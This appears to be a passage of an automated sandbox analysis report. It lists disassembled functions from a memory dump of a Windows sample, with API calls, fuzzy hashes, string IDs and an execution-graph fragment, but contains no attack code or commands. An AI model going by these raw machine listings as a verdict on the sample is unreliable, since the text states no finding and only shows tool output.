                                                                                                                                          Similarity
                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                          • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                          • Instruction ID: b149951d571dd2988575c048113dc3243b3dd0027d4cc14ec53b28f2a77456ba
                                                                                                                                          • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                          • Instruction Fuzzy Hash: ADA12772E042869FEB25CF18C9A17AEBBE5EF55310F1841ADE5C59B2C3C3B88941C750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000E7F69,?,?,?), ref: 000EA3FA
                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,000E7F69,?), ref: 000EA43E
                                                                                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,000E7F69,?,?,?,?,?,?,?), ref: 000EA4BF
                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,000E7F69,?,?,?,?,?,?,?,?,?,?), ref: 000EA4C6
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2287278272-0
                                                                                                                                          • Opcode ID: 74a79aad50a915740926cdb32946f2de41a6fe1e4c29b59fa412d6343165809d
                                                                                                                                          • Instruction ID: 6b4bbd88169351ba783f1feb8f98e19bb2316c4384f68f80977e7be4ae0de469
                                                                                                                                          • Opcode Fuzzy Hash: 74a79aad50a915740926cdb32946f2de41a6fe1e4c29b59fa412d6343165809d
                                                                                                                                          • Instruction Fuzzy Hash: ED41CE712483C19ED731DF25DC45BEEBBE4AB8A300F04491DB5E0A71C1D6A4AB489B53
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                          • Opcode ID: 39c084d712e9b617ea9f06a069a8dcb8f41aa46ff83c4e7e07682ba2e65265d6
                                                                                                                                          • Instruction ID: e64d2dc09f60b2df3c3de365fe8d8a9b5666321dda8da82a8d41b0e02c9b759a
                                                                                                                                          • Opcode Fuzzy Hash: 39c084d712e9b617ea9f06a069a8dcb8f41aa46ff83c4e7e07682ba2e65265d6
                                                                                                                                          • Instruction Fuzzy Hash: 1441B47590066A9FCB219F68CC099EF7BBCEF11310F000129FA55F7256DB30AE558AA4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,001047C6,00000000,00000000,001057FB,?,001057FB,?,00000001,001047C6,2DE85006,00000001,001057FB,001057FB), ref: 0010C9D5
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010CA5E
                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0010CA70
                                                                                                                                          • __freea.LIBCMT ref: 0010CA79
                                                                                                                                            • Part of subcall function 00108E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00104286,?,0000015D,?,?,?,?,00105762,000000FF,00000000,?,?), ref: 00108E38
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                          • Opcode ID: 30d5f61583b4599ff078413a30bba29469796265293158c898961c28317a2ae8
                                                                                                                                          • Instruction ID: 88c24ff4ef4bb0382e289c12145a3f7fcc21c75e9555c8820084752538d2e435
                                                                                                                                          • Opcode Fuzzy Hash: 30d5f61583b4599ff078413a30bba29469796265293158c898961c28317a2ae8
                                                                                                                                          • Instruction Fuzzy Hash: E6319C72A0021AABDB28DF64CC45DEE7BA5EF41310B144228FC55E7290EB75CD90DBD0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetDC.USER32(00000000), ref: 000FA666
                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 000FA675
                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000FA683
                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 000FA691
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                          • Opcode ID: 65592dc02509434435c828b2eceee61ba12c0e458112e8c6f3fd065efaa75ccc
                                                                                                                                          • Instruction ID: 2fee68006d72b0417339c2ed3088440948eb62055eef401d81ee4136fc700c42
                                                                                                                                          • Opcode Fuzzy Hash: 65592dc02509434435c828b2eceee61ba12c0e458112e8c6f3fd065efaa75ccc
                                                                                                                                          • Instruction Fuzzy Hash: 93E01235A43721B7D3716B60BC1DB8B3E64AB17B52F014311FB15979F0DBB486818BA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000FA699: GetDC.USER32(00000000), ref: 000FA69D
                                                                                                                                            • Part of subcall function 000FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000FA6A8
                                                                                                                                            • Part of subcall function 000FA699: ReleaseDC.USER32(00000000,00000000), ref: 000FA6B3
                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 000FA83C
                                                                                                                                            • Part of subcall function 000FAAC9: GetDC.USER32(00000000), ref: 000FAAD2
                                                                                                                                            • Part of subcall function 000FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 000FAB01
                                                                                                                                            • Part of subcall function 000FAAC9: ReleaseDC.USER32(00000000,?), ref: 000FAB99
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                                                                          • String ID: (
                                                                                                                                          • API String ID: 1061551593-3887548279
                                                                                                                                          • Opcode ID: 9a1ef533cc6a4b1191d40c3242400e8329014e660927cc6532525312d6b06e6b
                                                                                                                                          • Instruction ID: 5f39cccb5accb138662d75d3acc8d66c809355901fd26da6f2cf10f7a1774664
                                                                                                                                          • Opcode Fuzzy Hash: 9a1ef533cc6a4b1191d40c3242400e8329014e660927cc6532525312d6b06e6b
                                                                                                                                          • Instruction Fuzzy Hash: 7C9100B5608744AFD724DF25C844A6BBBE8FFC9700F00491EF59AD3660CB70A946CB62
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000E75E3
                                                                                                                                            • Part of subcall function 000F05DA: _wcslen.LIBCMT ref: 000F05E0
                                                                                                                                            • Part of subcall function 000EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000EA598
                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000E777F
                                                                                                                                            • Part of subcall function 000EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA501
                                                                                                                                            • Part of subcall function 000EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000EA325,?,?,?,000EA175,?,00000001,00000000,?,?), ref: 000EA532
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                          • String ID: :
                                                                                                                                          • API String ID: 3226429890-336475711
                                                                                                                                          • Opcode ID: fff399c627444e6c0a6aa3ef063d2215a31cb3689c459803c5f904a9e8ba02ea
                                                                                                                                          • Instruction ID: 05be4e07b439a30fed5b7f8273c23a768a8eb83d84a18ec843a77ccb3f4f8526
                                                                                                                                          • Opcode Fuzzy Hash: fff399c627444e6c0a6aa3ef063d2215a31cb3689c459803c5f904a9e8ba02ea
                                                                                                                                          • Instruction Fuzzy Hash: 97418071805598AEEB25EB61CC59EEEB7BCAF55300F004096B609B3093DB745F85DB60
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _wcslen
                                                                                                                                          • String ID: }
                                                                                                                                          • API String ID: 176396367-4239843852
                                                                                                                                          • Opcode ID: bb74a0bf8d379bb2629df1ebf4b7c7b22051e48b243caebac33417ccdfa91edc
                                                                                                                                          • Instruction ID: cc470a22e3518a94af88ec8f50bd66db4fe90bdff5b87e6bf82f5a78ad052b4f
                                                                                                                                          • Opcode Fuzzy Hash: bb74a0bf8d379bb2629df1ebf4b7c7b22051e48b243caebac33417ccdfa91edc
                                                                                                                                          • Instruction Fuzzy Hash: 3221387290470E5AD730EA64D845FBBB3DCDF90B50F04042AF780C3541E7A9ED4897A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _swprintf.LIBCMT ref: 000EB9B8
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: __vswprintf_c_l_swprintf
                                                                                                                                          • String ID: %c:\
                                                                                                                                          • API String ID: 1543624204-3142399695
                                                                                                                                          • Opcode ID: de9056661f2ada98569f7952f6a2a38acee8e3beaaf89afc80a43585976ee196
                                                                                                                                          • Instruction ID: 406ac623e15bd06fdd65d11d215adacc90f58da3651ca93c890bf59aab053514
                                                                                                                                          • Opcode Fuzzy Hash: de9056661f2ada98569f7952f6a2a38acee8e3beaaf89afc80a43585976ee196
                                                                                                                                          • Instruction Fuzzy Hash: 460122731003516DDA716B6A8C46D7BB7ECEF91370F54442AF584E3082EB30D84082B2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000EE2E8: _swprintf.LIBCMT ref: 000EE30E
                                                                                                                                            • Part of subcall function 000EE2E8: _strlen.LIBCMT ref: 000EE32F
                                                                                                                                            • Part of subcall function 000EE2E8: SetDlgItemTextW.USER32(?,0011E274,?), ref: 000EE38F
                                                                                                                                            • Part of subcall function 000EE2E8: GetWindowRect.USER32(?,?), ref: 000EE3C9
                                                                                                                                            • Part of subcall function 000EE2E8: GetClientRect.USER32(?,?), ref: 000EE3D5
                                                                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                          • SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                                          • String ID: 0
                                                                                                                                          • API String ID: 2622349952-4108050209
                                                                                                                                          • Opcode ID: a2b1ecdc0f05425fea013a1e5dd0813991ade05932349a66528fd68d6c6b561e
                                                                                                                                          • Instruction ID: cf7e0403a3daf9c88bd891ba868783979838df731c13441588134a25216a9163
                                                                                                                                          • Opcode Fuzzy Hash: a2b1ecdc0f05425fea013a1e5dd0813991ade05932349a66528fd68d6c6b561e
                                                                                                                                          • Instruction Fuzzy Hash: C1F08CB01042CCAEDF590F62C80DAEA3B99AB01744F088218FD44709E1CB74CA90AA10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,000F1101,?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FEA
                                                                                                                                          • GetLastError.KERNEL32(?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FF6
                                                                                                                                            • Part of subcall function 000E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E6C54
                                                                                                                                          Strings
                                                                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000F0FFF
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                          • API String ID: 1091760877-2248577382
                                                                                                                                          • Opcode ID: 72cdfdc761a6e198b93f17266d53eb36c379617353b59f22e6f829cf6d7d5348
                                                                                                                                          • Instruction ID: d0612ab230753b69e7619a85e287b84f5a750708f8c61c890ec8469146639061
                                                                                                                                          • Opcode Fuzzy Hash: 72cdfdc761a6e198b93f17266d53eb36c379617353b59f22e6f829cf6d7d5348
                                                                                                                                          • Instruction Fuzzy Hash: 92D02E32548130BBC6143324BE0ACFE3C049B32B71B308724F138706EACF220AC192A6
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,000EDA55,?), ref: 000EE2A3
                                                                                                                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000EDA55,?), ref: 000EE2B1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                          • String ID: RTL
                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                          • Opcode ID: e8cefa781440bcbd44c1eb04ab3905077a9fe3f57fceec9a33149449e9210b69
                                                                                                                                          • Instruction ID: b334c83439d222cf82e329e0db736746e9d9c67d0bceeeef1f26c49ebb2417b4
                                                                                                                                          • Opcode Fuzzy Hash: e8cefa781440bcbd44c1eb04ab3905077a9fe3f57fceec9a33149449e9210b69
                                                                                                                                          • Instruction Fuzzy Hash: 0FC0123164075066E63417657D0DBC36E985B04B51F05049CB251FA5D5D6A5C5C086A0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:6.1%
                                                                                                                                          Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:124
                                                                                                                                          Total number of Limit Nodes:5
                                                                                                                                          execution_graph 106266 7ffdf7ca1878 106267 7ffdf7ca1881 __scrt_release_startup_lock 106266->106267 106269 7ffdf7ca1885 __isa_available_init 106267->106269 106270 7ffdf7cabda4 106267->106270 106271 7ffdf7cabdd8 106270->106271 106272 7ffdf7cabdc2 106270->106272 106297 7ffdf7cb2838 106271->106297 106301 7ffdf7ca7b88 15 API calls _invalid_parameter_noinfo 106272->106301 106275 7ffdf7cabdc7 106302 7ffdf7cad6d4 32 API calls _invalid_parameter_noinfo 106275->106302 106278 7ffdf7cabe0a 106303 7ffdf7cabb84 36 API calls 106278->106303 106279 7ffdf7cabdd3 106279->106269 106281 7ffdf7cabe34 106304 7ffdf7cabd40 15 API calls 2 library calls 106281->106304 106283 7ffdf7cabe4a 106284 7ffdf7cabe63 106283->106284 106285 7ffdf7cabe52 106283->106285 106306 7ffdf7cabb84 36 API calls 106284->106306 106305 7ffdf7ca7b88 15 API calls _invalid_parameter_noinfo 106285->106305 106289 7ffdf7cabe7f 106290 7ffdf7cabec8 106289->106290 106291 7ffdf7cabeaf 106289->106291 106295 7ffdf7cabe57 106289->106295 106309 7ffdf7cac8ac 15 API calls 2 library calls 106290->106309 106307 7ffdf7cac8ac 15 API calls 2 library calls 106291->106307 106294 7ffdf7cabeb8 106308 7ffdf7cac8ac 15 API calls 2 library calls 106294->106308 106310 7ffdf7cac8ac 15 API calls 2 library calls 106295->106310 106298 7ffdf7cabddd GetModuleFileNameA 106297->106298 106299 7ffdf7cb2845 106297->106299 106298->106278 106311 7ffdf7cb2680 49 API calls 4 library calls 106299->106311 106301->106275 106302->106279 106303->106281 106304->106283 106305->106295 106306->106289 106307->106294 106308->106279 106309->106295 106310->106279 106311->106298 106262 7ffd9b8a1f8c 106263 7ffd9b8a1f95 LoadLibraryW 106262->106263 106265 7ffd9b8a2054 106263->106265 106312 7ffd9b8a1ecd 106313 7ffd9b8a1edf SetErrorMode 106312->106313 106315 7ffd9b8a1f63 106313->106315 106148 7ffdf7ca16b0 106149 7ffdf7ca16d6 106148->106149 106150 7ffdf7ca16de 106149->106150 106151 7ffdf7ca16ed dllmain_raw 106149->106151 106156 7ffdf7ca170d 106149->106156 106151->106150 106152 7ffdf7ca1700 106151->106152 106165 7ffdf7ca14b0 106152->106165 106155 7ffdf7ca1724 106157 7ffdf7ca175a 106155->106157 106198 7ffdf7cf00d0 DisableThreadLibraryCalls 106155->106198 106156->106150 106197 7ffdf7cf00d0 DisableThreadLibraryCalls 106156->106197 106157->106150 106158 7ffdf7ca14b0 58 API calls 106157->106158 106161 7ffdf7ca1770 106158->106161 106160 7ffdf7ca1740 106162 7ffdf7ca14b0 58 API calls 106160->106162 106161->106150 106163 7ffdf7ca177a dllmain_raw 106161->106163 106164 7ffdf7ca174d dllmain_raw 106162->106164 106163->106150 106164->106157 106166 7ffdf7ca14b8 106165->106166 106177 7ffdf7ca14f1 __scrt_acquire_startup_lock 106165->106177 106167 7ffdf7ca14bd 106166->106167 106168 7ffdf7ca14e5 106166->106168 106169 7ffdf7ca14d8 __scrt_dllmain_crt_thread_attach 106167->106169 106170 7ffdf7ca14c2 106167->106170 106199 7ffdf7ca19ac 106168->106199 106171 7ffdf7ca14d6 106169->106171 106174 7ffdf7ca14c7 106170->106174 106212 7ffdf7ca18ec 22 API calls 106170->106212 106171->106156 106172 7ffdf7ca164a 106172->106156 106174->106156 106176 7ffdf7ca1675 106215 7ffdf7ca1968 15 API calls __scrt_release_startup_lock 106176->106215 106177->106172 106177->106176 106214 7ffdf7ca1d14 7 API calls __scrt_fastfail 106177->106214 106180 7ffdf7ca167a 106216 7ffdf7ca1998 12 API calls __vcrt_uninitialize_ptd 106180->106216 106181 7ffdf7ca1522 __scrt_acquire_startup_lock 106183 7ffdf7ca154e 106181->106183 106193 7ffdf7ca1526 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 106181->106193 106213 7ffdf7ca1d14 7 API calls __scrt_fastfail 106181->106213 